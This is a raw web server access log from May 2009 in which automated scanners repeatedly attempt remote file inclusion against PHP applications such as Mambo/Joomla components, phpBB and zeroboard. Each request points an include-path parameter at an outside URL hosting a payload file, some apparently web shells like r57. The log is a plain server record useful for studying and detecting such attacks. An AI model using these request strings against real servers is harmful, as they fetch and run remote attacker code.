211.241.40.51 - - [17/May/2009:08:52:41 -0500] "GET /logs//shoutbox/expanded.php?conf=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.241.40.51 - - [17/May/2009:08:52:41 -0500] "GET //shoutbox/expanded.php?conf=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.241.40.51 - - [17/May/2009:08:52:41 -0500] "GET /logs/access_log.1238112000//shoutbox/expanded.php?conf=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:08:53:12 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:08:53:12 -0500] "GET /logs/errors.php?error=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:08:53:12 -0500] "GET /errors.php?error=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
201.28.103.46 - - [17/May/2009:08:53:15 -0500] "GET /logs/access_log.1239926400//index.php?configFile=http://www.bloodsport-switzerland.org//content/download/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:08:53:34 -0500] "GET /logs/access_log.1236643200/errors.php?error=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.200.8.89 - - [17/May/2009:08:58:08 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
209.200.8.89 - - [17/May/2009:08:58:09 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
218.27.203.107 - - [17/May/2009:09:00:21 -0500] "GET /?sIncPath=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:09:00:24 -0500] "GET /logs/access_log.1238544000/?sIncPath=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:09:00:25 -0500] "GET /logs/?sIncPath=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 189698 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:09:00:27 -0500] "GET /logs/access_log.1237420800/?sIncPath=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
80.231.93.159 - - [17/May/2009:09:00:42 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
80.231.93.159 - - [17/May/2009:09:00:43 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
24.39.162.98 - - [17/May/2009:09:00:47 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
24.39.162.98 - - [17/May/2009:09:00:47 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
81.175.71.121 - - [17/May/2009:09:01:05 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:09:01:05 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:09:01:20 -0500] "GET /logs/access_log.1237248000/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:09:01:37 -0500] "GET /logs/access_log.1239667200/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
83.103.72.130 - - [17/May/2009:09:02:47 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:09:02:48 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
24.39.162.98 - - [17/May/2009:09:02:53 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
24.39.162.98 - - [17/May/2009:09:02:53 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.103.72.130 - - [17/May/2009:09:02:54 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:09:02:55 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
116.121.201.70 - - [17/May/2009:09:04:21 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
116.121.201.70 - - [17/May/2009:09:04:24 -0500] "GET //skin/zero_vote/error.php?dir=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
80.231.93.159 - - [17/May/2009:09:05:09 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
80.231.93.159 - - [17/May/2009:09:05:10 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
195.239.112.19 - - [17/May/2009:09:06:24 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
195.239.112.19 - - [17/May/2009:09:06:25 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
80.231.93.159 - - [17/May/2009:09:07:07 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
80.231.93.159 - - [17/May/2009:09:07:07 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
203.130.231.111 - - [17/May/2009:09:07:09 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:09:07:09 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:09:07:10 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:09:07:13 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:09:07:27 -0500] "GET /?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:09:07:27 -0500] "GET /logs/access_log.1233014400/?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:09:07:35 -0500] "GET /logs/?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 189698 "-""Mozilla/5.0"
83.103.72.130 - - [17/May/2009:09:07:40 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:09:07:40 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:09:07:44 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:09:07:44 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:09:07:44 -0500] "GET /logs/access_log.1236643200/?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
24.39.162.98 - - [17/May/2009:09:07:48 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
24.39.162.98 - - [17/May/2009:09:07:48 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
211.172.225.50 - - [17/May/2009:09:11:00 -0500] "GET /logs/errors.php?error=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
211.172.225.50 - - [17/May/2009:09:11:00 -0500] "GET /errors.php?error=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
203.130.231.111 - - [17/May/2009:09:12:15 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:09:12:19 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:09:12:39 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:09:12:39 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:09:13:47 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
83.103.72.130 - - [17/May/2009:09:13:48 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
67.15.206.26 - - [17/May/2009:09:16:23 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.15.206.26 - - [17/May/2009:09:16:23 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.15.206.26 - - [17/May/2009:09:16:23 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
79.45.98.65 - - [17/May/2009:09:17:29 -0500] "GET /logs//include/write.php?dir=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.826"
79.45.98.65 - - [17/May/2009:09:17:30 -0500] "GET //include/write.php?dir=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.826"
203.130.231.111 - - [17/May/2009:09:18:39 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:09:18:40 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:09:18:40 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:09:18:41 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:09:20:32 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
203.130.231.111 - - [17/May/2009:09:20:33 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
81.176.226.164 - - [17/May/2009:09:21:38 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.176.226.164 - - [17/May/2009:09:21:38 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.176.226.164 - - [17/May/2009:09:21:38 -0500] "GET /logs/access_log.1234483200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
81.176.226.164 - - [17/May/2009:09:21:46 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
38.99.183.43 - - [17/May/2009:09:22:45 -0500] "GET //config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
38.99.183.43 - - [17/May/2009:09:22:50 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
38.99.183.43 - - [17/May/2009:09:23:01 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:09:25:36 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:09:25:39 -0500] "GET /logs/access_log.1236470400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:09:25:45 -0500] "GET /logs/access_log.1235952000//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:09:25:46 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
209.200.8.89 - - [17/May/2009:09:26:02 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kenniscentrumgemeenten.nl//assets/export/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
209.200.8.89 - - [17/May/2009:09:26:02 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kenniscentrumgemeenten.nl//assets/export/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.15.206.26 - - [17/May/2009:09:26:43 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.187.99.209 - - [17/May/2009:09:29:52 -0500] "GET /logs/access_log.1235865600//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
66.187.99.209 - - [17/May/2009:09:29:52 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
66.187.99.209 - - [17/May/2009:09:29:52 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:09:29:54 -0500] "GET //?_zb_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:09:29:54 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:09:29:56 -0500] "GET /logs//?_zb_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 200 189703 "-""Mozilla/5.0"
85.214.37.11 - - [17/May/2009:09:30:53 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
85.214.37.11 - - [17/May/2009:09:30:53 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
85.214.37.11 - - [17/May/2009:09:30:53 -0500] "GET /logs/access_log.1236643200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
85.214.37.11 - - [17/May/2009:09:30:57 -0500] "GET /logs/access_log.1239321600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
212.227.57.13 - - [17/May/2009:09:31:05 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bloodsport-switzerland.org//content/download/safe3.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.76"
212.227.57.13 - - [17/May/2009:09:31:06 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bloodsport-switzerland.org//content/download/safe3.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.76"
117.110.58.66 - - [17/May/2009:09:33:08 -0500] "GET /logs/access_log.1232323200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
38.99.183.43 - - [17/May/2009:09:33:10 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
222.236.44.45 - - [17/May/2009:09:35:09 -0500] "GET //manager/frontinc/prepend.php?_PX_config[manager_path]=http://eopin.com/limesurvey/classes/core/Priv8/SB-iD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.63"
209.200.8.89 - - [17/May/2009:09:35:36 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
209.200.8.89 - - [17/May/2009:09:35:38 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.15.206.26 - - [17/May/2009:09:36:06 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.15.206.26 - - [17/May/2009:09:36:06 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.15.206.26 - - [17/May/2009:09:36:06 -0500] "GET /logs/access_log.1236643200/lostpasswd.php?env[include_prefix]=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.15.206.26 - - [17/May/2009:09:36:06 -0500] "GET /logs/access_log.1236902400/lostpasswd.php?env[include_prefix]=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.52.230.168 - - [17/May/2009:09:36:11 -0500] "GET //?_zb_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
72.52.230.168 - - [17/May/2009:09:36:11 -0500] "GET /logs//?_zb_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 200 189703 "-""Mozilla/5.0"
72.52.230.168 - - [17/May/2009:09:36:38 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:09:37:57 -0500] "GET //?_zb_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:09:37:59 -0500] "GET /logs//?_zb_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 200 189703 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:09:38:17 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:09:40:08 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:09:40:08 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:09:40:08 -0500] "GET /logs/access_log.1239062400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.232.102.70 - - [17/May/2009:09:41:00 -0500] "GET ///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:09:41:00 -0500] "GET /logs///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.813"
209.200.8.89 - - [17/May/2009:09:41:03 -0500] "GET /logs/!rfihttp://208.98.22.241/id.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
209.200.8.89 - - [17/May/2009:09:41:04 -0500] "GET /!rfihttp://208.98.22.241/id.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
79.45.98.65 - - [17/May/2009:09:43:57 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.826"
79.45.98.65 - - [17/May/2009:09:43:58 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.826"
89.187.131.186 - - [17/May/2009:09:44:00 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:09:44:00 -0500] "GET //e404.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
67.15.177.55 - - [17/May/2009:09:44:57 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.kenniscentrumgemeenten.nl//assets/export/id.txt??%0D?? HTTP/1.1" 404 292 "-""libwww-perl/5.65"
67.15.177.55 - - [17/May/2009:09:44:57 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.kenniscentrumgemeenten.nl//assets/export/id.txt??%0D?? HTTP/1.1" 404 297 "-""libwww-perl/5.65"
193.239.4.3 - - [17/May/2009:09:46:35 -0500] "GET /logs/access_log.1239062400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
193.239.4.3 - - [17/May/2009:09:46:35 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
193.239.4.3 - - [17/May/2009:09:46:35 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
116.50.163.164 - - [17/May/2009:09:49:14 -0500] "GET //e404.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
116.50.163.164 - - [17/May/2009:09:49:14 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
